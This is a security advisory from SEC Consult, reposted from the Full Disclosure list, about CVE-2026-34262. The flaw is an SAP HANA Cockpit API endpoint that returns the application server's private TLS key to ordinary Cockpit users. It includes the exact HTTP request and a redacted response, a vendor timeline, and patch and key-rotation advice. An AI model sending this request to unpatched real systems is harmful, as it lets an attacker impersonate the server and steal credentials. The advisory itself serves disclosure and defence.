SEC Consult SA-20260415-0 :: Exposed Private Key of X.509 Certificate in SAP HANA Cockpit & SAP HANA Database Explorer
Full Disclosuremailing list archivesFrom: SEC Consult Vulnerability Lab via Full 2026-4-29 17:43:35 Author: seclists.org(查看原文) 阅读量:25 收藏
Full Disclosuremailing list archivesFrom: SEC Consult Vulnerability Lab via Full 2026-4-29 17:43:35 Author: seclists.org(查看原文) 阅读量:25 收藏
Full Disclosure mailing list archives
From: SEC Consult Vulnerability Lab via Fulldisclosure <fulldisclosure () seclists org>
Date: Wed, 15 Apr 2026 09:25:38 +0000
SEC Consult Vulnerability Lab Security Advisory < 20260415-0 >
=======================================================================
title: Exposed Private Key of X.509 Certificate
product: SAP HANA Cockpit & SAP HANA Database Explorer
vulnerable version: HANA Cockpit <2.18.2 (HRTT <2.16.254002)
fixed version: HANA Cockpit 2.18.2 (HRTT 2.16.254002)
CVE number: CVE-2026-34262
impact: high
homepage:https://www.sap.com/
found: 2025-04-24
by: Ben Samtleben (Office Berlin)
Bernd Kaufmann (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"SAP is one of the world’s leading producers of software for the management
of business processes."
Source:https://www.sap.com/about/what-is-sap.html
"SAP HANA cockpit is the main administration tool for SAP HANA. The SAP HANA
cockpit provides tools for the administration and monitoring of SAP HANA
databases (databases), and for development capabilities through the SAP
HANA database explorer."
Source:https://help.sap.com/docs/SAP_HANA_COCKPIT/df02d156db744412ad1f9e887aba68ad/ab5d442cc8a340fea07c15ef6f8eb537.html
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately, see
SAP Security Note 3730639 (https://me.sap.com/notes/3730639.
This patch does not completely mitigate the risk that the private keys were
obtained by an attacker in the past. Therefore, SEC Consult strongly
recommends rotating the affected X.509 certificates and corresponding private
keys - even if this is currently not mentioned in the SAP Security Note.
SEC Consult highly recommends to perform a thorough security review of the
product conducted by security professionals to identify and resolve potential
further security issues.
Vulnerability overview/description:
-----------------------------------
1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)
SAP HANA Cockpit users with access to the Database Explorer can obtain the
X.509 certificate issued to the application server and its corresponding
private key. This information can be used to impersonate the application server
on network level, allowing an attacker to obtain user credentials or other sensitive
data. The issue arises if mutual TLS (mTLS) is configured for communication with the SAP HANA database.
Proof of concept:
-----------------
1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)
When accessing the Database Explorer via the SAP HANA Cockpit, the following
HTTP request is sent to the HRTT service in the background:
GET /hrtt-service/sap/hana/cst/api/v2/databases HTTP/1.1
Host: hana-cockpit-web-app.example.org:31033
Cookie: JSESSIONID=[...]
[...]
The server response contains a list of all available databases.
{
"__count": 6,
"d": {
"results": [
{
"__metadata": {
"uri": "/sap/hana/cst/api/v2/databases('C123456789')",
"type": "database.Database"
},
"id": "C123456789",
"group_id": 0,
"catalog_name": "SID@SID",
"type": "COCKPIT_RESOURCE",
"disabled": false,
"has_login": false,
"cockpit_resource_id": 123456789,
"database_product_name": "HANA",
"options": {
"schema_filter": "[]"
},
"set_xs_applicationuser": true,
"hdl_support_sof": false
},
// [... more entries here...]
]
}
}
However, the response can vary - most likely depending on other HTTP requests
that have been sent. A more verbose response can be triggered by manually
interacting with the Database Explorer and then repeating the request.
(No database credentials are needed.) Then, the following information is returned:
{
"__count": 6,
"d": {
"results": [
{
"__metadata": {
"uri": "/sap/hana/cst/api/v2/databases('C123456789')",
"type": "database.Database"
},
"id": "C123456789",
"group_id": 0,
"catalog_name": "SID@SID",
"type": "COCKPIT_RESOURCE",
"disabled": false,
"has_login": false,
"cockpit_resource_id": 123456789,
"database_product_name": "HANA",
"cockpit_resource_name": "SID@SID",
"options": {
"hosts": [
{
"host": "isidhdb01.example.org",
"port": "31013"
}
],
"databaseName": "SID",
"encrypt": true,
"ca": [
"-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]zg==\n-----END
CERTIFICATE-----\n",
"-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]c4=\n-----END CERTIFICATE-----\n",
],
"sslValidateCertificate": true,
"key": [
"-----BEGIN PRIVATE KEY-----MII[... private key removed ...]8tQ==-----END PRIVATE KEY-----"
],
"cert": [
"-----BEGIN CERTIFICATE-----MII[... certificate removed ...]QHvC-----END CERTIFICATE----------BEGIN
CERTIFICATE-----MII[...]yotP-----END CERTIFICATE-----"
],
"schema_filter": "[]"
},
"set_xs_applicationuser": true,
"hdl_support_sof": false
}
// [... more entries here...]
]
}
}
The HTTP response does not only leak additional metadata, but most importantly an X.509
certificate chain and the private key of the leaf certificate. This certificate is issued
to the application server hosting the SAP HANA Cockpit, not to the database server.
The vulnerability can be reproduced with the Cockpit Administrator and the Cockpit User role,
so it does not require administrative privileges.
Vulnerable / tested versions:
-----------------------------
The following versions are affected:
* SAP HANA Cockpit versions prior to 2.18.2 (SAP HANA Runtime Tools prior to 2.16.254002)
Vendor contact timeline:
------------------------
2025-07-01: Contacting vendor through vulnerability submission web form, receiving
automatic confirmation.
2025-10-13: Recontacting vendor via email after no response.
2025-10-17: Vendor responds, declaring the issue "resolved" by Aug 30 without
further details.
2025-10-29: Inquiring about assigned CVE or SAP Security Note.
2025-11-12: Sending reminder after no response.
2025-11-28: Sending another reminder, still no response.
2025-12-03: Vendor responds with the version containing the patch; states that
no CVE will be assigned.
2025-12-05: Contacting vendor, emphasizing that SAP Security Note and CVE are
essential to inform customers and make them rotate their certificates.
2025-12-10: Vendor responds, requesting time to clarify with internal stakeholders.
2026-02-11: Contacting the vendor again, asking for any updates.
2026-02-12: Vendor responds, reiterating patched version, no mention of SAP Security
Note or CVE.
2026-02-12: Reminding vendor of importance of notifying affected customers due to
required certificate rotation.
2026-02-25: Contacting MITRE regarding CVE assignment dispute.
2026-02-27: Vendor agrees to issuing SAP Security Note and asks to wait with public disclosure.
2026-04-14: SAP Security Note 3730639 (CVE-2026-34262) is published by the vendor.
2026-04-15: Public release of advisory
Solution:
---------
According to SAP, the vulnerability was fixed in SAP HANA Cockpit version 2.18.2 (HRTT version 2.16.254002).
For information on the available patch, please see SAP Security Note 3730639 (https://me.sap.com/notes/3730639).
However, this does not completely mitigate the risk that the private keys were
obtained by an attacker in the past. Therefore, SEC Consult strongly recommends
rotating the affected X.509 certificates and corresponding private keys -
even if this is currently not mentioned in the SAP Security Note.
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your applicationhttps://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local officeshttps://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web:https://www.sec-consult.com
Blog:https://blog.sec-consult.com
X:https://x.com/sec_consult
EOF Ben Samtleben, Bernd Kaufmann / @2026
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- SEC Consult SA-20260415-0 :: Exposed Private Key of X.509 Certificate in SAP HANA Cockpit & SAP HANA Database Explorer SEC Consult Vulnerability Lab via Fulldisclosure (Apr 29)
文章来源: https://seclists.org/fulldisclosure/2026/Apr/16
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh